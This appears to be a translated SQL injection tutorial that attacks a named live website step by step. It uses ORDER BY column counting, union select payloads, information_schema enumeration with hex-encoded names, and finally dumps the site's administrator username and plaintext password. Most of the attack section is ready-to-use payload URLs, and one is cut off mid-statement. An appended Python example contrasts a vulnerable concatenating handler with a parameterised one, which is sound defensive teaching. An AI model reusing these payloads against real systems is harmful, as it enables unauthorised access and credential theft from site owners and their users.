Target: http://www.bkjia.com/news.php?id=32
First we determine the number of columns with ORDER BY:
http://www.bkjia.com/news.php?id=32+order+by+6 (correct)
http://www.bkjia.com/news.php?id=32+order+by+7 (error)
This tells us the query has 6 columns.
Now we find out which columns are displayed on the page:
http://www.bkjia.com/news.php?id=32+and+1=2+union+select+1,2,3,4,5,6
The 2nd and 4th columns are displayed on the page. Next, let's gather basic information using the following functions:
version() - database version; database() - current database; user() - current user
Replace columns 2 and 4 with these functions:
http://www.bkjia.com/news.php?id=32+and+1=2+union+select+1,user(),3,database(),5,6
Figure (screenshot not included): the current user is sq_hwcl@fgdrgfhdfh, which does not have ROOT privileges.
Current database: sq_hwscl; database version: 5.0.51a-community-nt. // MySQL 5.0 and later keep information about all databases in the information_schema virtual database.
From the above we know the database is above version 5.0, so we can use information_schema to dump the table list. First, dump the table names: http://www.bkjia.com/news.php?id=32+and+1=2+union+select+1,table_name,3,4,5,6+from+information_schema.tables+where+table_schema=0x73715F687773636C20
0x73715F687773636C20 is the hexadecimal encoding of sq_hwscl. The table we want did not appear, so we append a LIMIT clause to the end of the statement; limit 0,1 means only the first row is displayed.
The first row is not the table we want, so we change the statement to http://www.bkjia.com/news.php?id=32+and+1=2+union+select+1,table_name,3,4,5,6+from+information_schema.tables+where+table_schema=0x73715F687773636C20+limit+
We can see that the table tb_admin is very likely used to store the administrator account and password. With the table name, we can now dump the column names. The statement is as follows: http://www.bkjia.com/news.php?id=32+and+1=2+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0x74625F61646D696E
0x74625F61646D696E is the hexadecimal encoding of the table name tb_admin.
You can work out the logic of these two statements for yourself.
By adding limit + we dumped the column names: adminID, adminName, adminPwd. With these, we query the table directly: http://www.bkjia.com/news.php?id=32+and+1=2+union+select+1,adminName,3,adminPwd,5,6+from+tb_admin dumps the administrator account and password.
The password is stored unencrypted, in plaintext (yikes!). Once you have this, the rest is straightforward. Note: do not attack or damage the website used in this demonstration. Thank you.
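The root cause of the whole walkthrough is a handler that pastes the id parameter straight into SQL. The example below is added here and is not the site's code: it contrasts such a handler with a hardened one (integer check plus a bound parameter) against an in-memory sqlite3 database whose table and column names mirror the post; the schema and row contents are constructed for the demo.

```python
import sqlite3

# The union payload from the walkthrough (spaces instead of '+').
PAYLOAD = "32 and 1=2 union select 1,adminName,3,adminPwd,5,6 from tb_admin"


def make_db():
    """Constructed schema: a 6-column news table and the tb_admin table from the post."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT, c5 TEXT, c6 TEXT);
        INSERT INTO news VALUES (32, 'Hello', 'text', 'editor', '', '');
        CREATE TABLE tb_admin(adminID INTEGER, adminName TEXT, adminPwd TEXT);
        INSERT INTO tb_admin VALUES (1, 'admin', 'plaintext-secret');
        """
    )
    return con


def vulnerable_news(con, id_param):
    """String concatenation: anything after the number becomes part of the SQL."""
    sql = "SELECT * FROM news WHERE id=" + id_param
    return con.execute(sql).fetchall()


def hardened_news(con, id_param):
    """Two independent fixes: reject non-integers, and bind the value as data."""
    if not id_param.isdigit():
        raise ValueError("id must be an integer")
    # The '?' placeholder is filled by the driver; the value is never parsed as SQL.
    return con.execute("SELECT * FROM news WHERE id=?", (int(id_param),)).fetchall()


def hardened_rejects(con, id_param):
    """True if the hardened handler refuses the input instead of running it."""
    try:
        hardened_news(con, id_param)
    except ValueError:
        return True
    return False
```

With the vulnerable handler the payload returns the tb_admin row in place of the news row; the hardened handler never lets it reach the database.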